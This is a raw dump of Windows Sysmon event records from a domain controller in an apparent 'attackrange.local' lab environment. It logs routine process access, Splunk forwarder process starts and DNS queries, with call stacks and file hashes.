10:40:23.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002372Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002371Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002369Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E17-5F80-7000-000000007F01}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002368Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.916{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E17-5F80-7000-000000007F01}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002367Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.750{733EE690-3E17-5F80-7000-000000007F01}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002366Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.244{733EE690-3E16-5F80-6F00-000000007F01}37603816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002365Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E16-5F80-6F00-000000007F01}3760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002364Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002363Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002362Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002361Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002360Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002359Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002358Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002357Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002356Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002355Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E16-5F80-6F00-000000007F01}3760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002354Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:23.072{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E16-5F80-6F00-000000007F01}3760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002353Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.906{733EE690-3E16-5F80-6F00-000000007F01}3760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.823{733EE690-3DF9-5F80-1200-000000007F01}1208wpad1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002382Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:22.774{733EE690-3E09-5F80-2F00-000000007F01}2464win-dc-72166190fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 10341000x80000000000000002389Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:25.119{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002388Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:25.119{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002387Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:25.104{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002386Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:25.104{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002385Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 